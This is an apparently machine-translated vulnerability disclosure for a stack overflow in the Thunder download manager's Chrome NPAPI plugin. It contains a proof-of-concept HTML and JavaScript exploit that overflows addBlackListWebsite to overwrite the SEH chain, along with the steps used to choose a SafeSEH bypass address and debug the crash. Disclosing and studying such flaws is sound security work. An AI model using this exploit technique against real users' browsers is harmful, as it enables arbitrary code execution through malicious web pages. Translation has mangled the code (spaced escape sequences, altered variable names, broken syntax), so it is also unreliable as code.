Thunder chrome plug-in stack overflow can cause arbitrary code execution

Thunder chrome plug-in stack overflow can cause arbitrary code execution

Thunder is an Internet download software developed by thunder. Thunder is based on multi-resource hyper-Threading Technology.
Download the software. When installing thunder, the wizard will recommend that you install browser extensions.
Thunder Download Extension for Chrome Extension
In the stack overflow vulnerability, users installed with Thunderbolt chrome extensions may execute arbitrary code when Browsing malicious web pages.

Thanks: test environment:

Windows 2003 Default Configuration



When you view the manifest. json file of the thunder chrome extension, it is found that the extension uses the NPAPI (Netscape

Plug-in Application Programming Interface and web scene plug-in Application Interface) implements xl_chrome.dll,

The public attribute is true, so xl_chrome can be called by any webpage.

POC:
 

<Embed type = "application/xl_chrome_plugin" id = "xl_chrome_plugin"> <script> var plugin = document. getElementById ("xl_chrome_plugin"); function exploit () {var I = 0; var exploit_string = ''; var nop = '\ x72 \ x00 \ x72 \ x00 '; // jz next_code; var safeseh_addr = '\ x0b \ x0b \ x27 \ x00 '; // call [ebp + 30 h] var jz_seh_addr = '\ x74 \ x22 \ x74 \ x22'; // skip sehwhile (I <20012) {I + = 1; exploit_string + = 'a';} exploit_string + = jz_seh_addr; exploit_string + = safeseh_addr; I = 0; while (I <20000) {I + = 1; exploit_string + = '\ x72 \ x00 \ x72 \ x00'; // nop} plugin. addBlackListWebsite (exploit_string) ;}</script> // large wooyun replaces a forward slash with two forward slashes.

Stack overflow exists in the AddBlackListWebsite implemented by xl_chrome (AddBlackListPage should also exist, others are not tested)



View Program-related protection using mona
 

You need bypass SafeSEH to find the bypass SafeSEH address.

Finally, select 0x00270b0b as the jump address.



Command Line

 

chrome.exe --plugin-startup-dialog

The id of the process that Immunity Debugger attaches to the chrome pop-up dialog box. chrome opens the POC page, F12 opens the console, and enters exploit () (to facilitate debugging and writing a function), a write exception is triggered.
 

I forgot to mention that because the program carries GS, it can only overwrite SafeSEH and trigger exceptions to enter the exception processing function,

At this time, the exception chain is overwritten by 0x00270B0B, which is the address where we select bypass SafeSEH and finally return to our controllable location.

The rest is the shellcode problem.

Solution:

NPAPI, google has long said it is about to be abandoned. Why does Thunder dare to continue using it?